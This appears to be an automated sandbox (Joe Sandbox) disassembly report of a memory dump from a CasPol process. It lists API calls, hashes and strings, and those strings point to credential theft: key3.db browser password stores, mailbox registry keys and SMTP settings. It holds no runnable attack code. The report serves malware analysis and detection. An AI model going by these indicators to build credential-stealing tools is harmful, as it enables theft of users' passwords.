                                                                                                                                                                                                                    • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                                    • API String ID: 3510742995-3170954634
                                                                                                                                                                                                                    • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                                                    • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0041DBAE
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0041DBDB
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0041DC47
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                                                    • String ID: @ $SQLite format 3
                                                                                                                                                                                                                    • API String ID: 231171946-3708268960
                                                                                                                                                                                                                    • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                                                    • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID: winWrite1$winWrite2
                                                                                                                                                                                                                    • API String ID: 438689982-3457389245
                                                                                                                                                                                                                    • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                                                    • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: winRead
                                                                                                                                                                                                                    • API String ID: 1297977491-2759563040
                                                                                                                                                                                                                    • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                                    • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                    • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                                    • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040AB9C
                                                                                                                                                                                                                      • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                                                      • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                                      • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                    • API String ID: 3337535707-2769808009
                                                                                                                                                                                                                    • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                                                                                                    • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                                                                                    • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                                    • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                                                                                                                      • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                                                                                                                      • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                                                                                                                      • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                                                      • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                                                      • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                                                      • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                                                    • SetCursor.USER32 ref: 0040B9F9
                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040BA0B
                                                                                                                                                                                                                    • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2374668499-0
                                                                                                                                                                                                                    • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                                                                                                                    • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040AD5B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040AD71
                                                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                                      • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                                      • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040ADA8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • <%s>, xrefs: 0040ADA2
                                                                                                                                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                                    • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                    • API String ID: 3699762281-1998499579
                                                                                                                                                                                                                    • Opcode ID: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                                                                                                                                                    • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: b4bc8ea3596b91dfe4b466af9048751b201f61ada43734c3eff6748fa3cff06f
                                                                                                                                                                                                                    • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4bc8ea3596b91dfe4b466af9048751b201f61ada43734c3eff6748fa3cff06f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                                                                                                                                                    • free.MSVCRT ref: 00409B00
                                                                                                                                                                                                                      • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2241099983-0
                                                                                                                                                                                                                    • Opcode ID: 71fd03afa15095c2d0ce6bd683e65a22e38aca543c51e447af1f15dc64016add
                                                                                                                                                                                                                    • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71fd03afa15095c2d0ce6bd683e65a22e38aca543c51e447af1f15dc64016add
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                                                                                      • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                                                                                      • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                                                                                    • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                                                                                    • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2775283111-0
                                                                                                                                                                                                                    • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                                                    • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(0000000A), ref: 00405F6C
                                                                                                                                                                                                                      • Part of subcall function 004015F4: GetDlgItem.USER32(?,?), ref: 00401604
                                                                                                                                                                                                                      • Part of subcall function 004015F4: GetClientRect.USER32(?,?), ref: 00401616
                                                                                                                                                                                                                      • Part of subcall function 004015F4: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401680
                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0040602B
                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 00406036
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                    • API String ID: 2498372239-3993045852
                                                                                                                                                                                                                    • Opcode ID: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                                                                                                                                                                                    • Instruction ID: a7623898fd9bb087a7334f25a668ee6c33d9336bc772a6b4061b4b4824447eab
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7317070640259FFEB229B52CC89DAF3E7CEBC5B98F10402DF401792A1CA794F11E669
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                    • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                                                                                    • API String ID: 885266447-2471937615
                                                                                                                                                                                                                    • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                                                                                                    • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406B11
                                                                                                                                                                                                                      • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                                                                                                                                      • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                                                                                                                                                                                                                      • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                    • String ID: Ul@$key3.db
                                                                                                                                                                                                                    • API String ID: 1968906679-1563549157
                                                                                                                                                                                                                    • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                                                                    • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _strcmpi$_mbscpy
                                                                                                                                                                                                                    • String ID: smtp
                                                                                                                                                                                                                    • API String ID: 2625860049-60245459
                                                                                                                                                                                                                    • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                                                                                                    • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408258
                                                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Close$EnumOpenmemset
                                                                                                                                                                                                                    • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                                                                                    • API String ID: 2255314230-2212045309
                                                                                                                                                                                                                    • Opcode ID: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
                                                                                                                                                                                                                    • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C28C
                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040C314
                                                                                                                                                                                                                      • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FocusMessagePostmemset
                                                                                                                                                                                                                    • String ID: S_@$l
                                                                                                                                                                                                                    • API String ID: 3436799508-4018740455
                                                                                                                                                                                                                    • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
